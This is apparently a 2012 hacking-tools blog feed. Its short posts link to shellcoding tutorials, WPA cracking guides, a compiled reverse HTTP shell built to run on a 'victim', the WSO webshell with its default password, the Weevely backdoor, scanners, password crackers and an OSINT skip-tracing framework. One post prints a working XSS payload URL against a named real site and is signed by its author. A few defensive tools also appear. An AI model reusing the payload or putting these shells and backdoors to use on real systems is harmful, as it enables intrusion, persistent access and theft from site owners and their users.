Wednesday, 4. April 2012
The Art of Win32 Shellcoding
Table of Contents

Introduction
Part 1: The Basics
What’s Shellcode?
The Types of Shellcode
Part 2: Writing Shellcode
Shellcode Skeleton
The Tools
Getting the Delta
Getting the Kernel32 imagebase
Getting the APIs
Null-Free byte Shellcode
Alphanumeric Shellcode
Egg-hunting Shellcode
Part 3: The Payload
Socket Programming
Bind Shell Payload
Reverse Shell Payload
Download & Execute Payload
Put All Together
Part 4: Implement your Shellcode into Metasploit
Conclusion
References
Appendix I – Important Structures

Info
http://www.codeproject.com/Articles/325776/The-Art-of-Win32-Shellcoding#ch2.1

Download source code
http://www.codeproject.com/KB/web-security/325776/win32-shellcode-src.zip

Cracking WPA/WPA2 - TUT
Cracking the pre-shared key in five different ways:
1. Use aircrack-ng (without CUDA support) to crack the pre-shared key (slow)
2. Use Pyrit and Cowpatty to crack key on the fly (passthrough mode using CUDA) (faster than way 1)
3. Use Pyrit alone to crack key on the fly (attack_passthrough mode) (faster than way 2 and is most recommended)
4. Pyrit CUDA Batch Mode – Create rainbow tables with pyrit
5. Brute force with Crunch and Pyrit (not recommended)

Download PDF
http://www.uploadarea.de/upload/rmm2kr87l97gbeogv82n2u324.html

Tuesday, 3. April 2012
Artillery - Linux
Artillery is a honeypot/monitoring/prevention tool used to protect Linux-based systems. Artillery opens listeners on multiple ports on the *nix system, and if anything touches them it automatically blacklists the source. In addition, it monitors the filesystem for changes and emails the changes back to you. It also detects SSH brute-force attacks and automatically blocks them as well.

Download
svn co http://svn.secmaniac.com/artillery artillery/
Then python install.py

Building an HTTP shell with AES + Proxy Support in Python
Got a little bored today and decided to write a reverse HTTP shell in Python that's platform independent and supports AES encryption when passing information back and forth. So this works on Linux, OSX, and Windows. The shell also supports proxy settings as well. This Python shell will initiate a reverse connection out of the network and connect to the attacker machine via pure HTTP communications. It's pretty straightforward how it works. I've byte-compiled the code so you do not need to have Python installed on the victim; it will simply run as a normal executable.

Download compiled shell.exe and all of the source code
https://www.secmaniac.com/files/encrypted_http_shell.zip

OATH Toolkit - Linux
The OATH Toolkit contains a shared library, a command-line tool and a PAM module that make it possible to build one-time password authentication systems. Supported technologies include the event-based HOTP algorithm and the time-based TOTP algorithm. OATH is the Open AuTHentication organization, which specifies the algorithms.

Download
http://download.savannah.gnu.org/releases/oath-toolkit/

Monday, 2. April 2012
John the Ripper - GUI
John the Ripper (JtR) is a fast command-line password cracker. 'Johnny' is a GUI for John the Ripper.
This GUI version will be very helpful to those who struggle with the command-line tool.

Download
http://openwall.info/wiki/john/johnny

WSO 2.5 Webshell
This utility provides a web interface for remotely operating the operating system and its services/daemons.
Features:

Cookie-based authorization
Server information
File manager (copy, rename, move, delete, chmod, touch, creating files and folders)
View, hex view, edit, download,
upload files
Working with zip archives (packing, unpacking) + tar.gz compression
Console
SQL manager (MySQL, PostgreSQL)
Execute PHP code
Working with strings + hash lookup in online databases
Bindport and back-connect (Perl)
Brute force FTP, MySQL, PgSQL
Search files, search text in files
Support for *nix-like and Windows systems
Anti-search-engine check (inspects the User-Agent; if it is a search engine crawler, returns a 404 error)
Optional AJAX
Small size: the boxed version is 22.8 KB
Selectable character encoding used by the shell

Info
Default password: root
(to change it, set the auth_pass variable to the MD5 hash of your new password)
http://pastebin.com/Qra8yeWX

X-Scan
Created: 2005-07-18
X-Scan is a general-purpose, multi-threaded network vulnerability scanner for a specific IP address range or a stand-alone computer, with plug-in support. Its features include service type detection, remote OS type and version detection, weak user/password pair checks, and the combined set of Nessus attack scripts.

Download
http://xfocus.org/programs/200507/X-Scan-v3.3-en.rar

Sunday, 1. April 2012
fifa - XSS
Domain:
de.predictor.fifa.com
URL:
hxxp://de.predictor.fifa.com/M/stats.mc?phase=2%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(%27XSS%20By%20Tur
KPoweR%20-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20:D%27)%3B%3C/ScRiPt%3E%3Ch1%3EXSS%20By%20TurKPoweR%2
0-%20FROM%20TURKEY%20-%20HELLO%20FIFA%20%20:D%3C/h1%3E%3C/marquee%3E

by
TurKPoweR

Skip Tracing Framework - online
The Skip Tracing Framework collects online information, including:

Domain names (DNS information, website information, machine specifics, the company's cloud services…)
IP address or network range information
Search for information about a company name
Full name and surname search tools
Email addresses of the target
Phone numbers that can be used for social engineering
Nickname search and information
Online password-hash lookup tools
Reverse image search tools
URL information
Specialized search engines

Info
http://makensi.es/stf/

Saturday, 31. March 2012
weevely - Stealth tiny web shell
Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application post-exploitation, and can be used as a hidden backdoor and as a useful telnet-like console replacement to manage web accounts, even when hosted on free hosting services. Just generate and upload the "server" PHP code to the target web server, and run the Weevely client locally to transmit shell commands.

Download
http://code.google.com/p/weevely/downloads/list
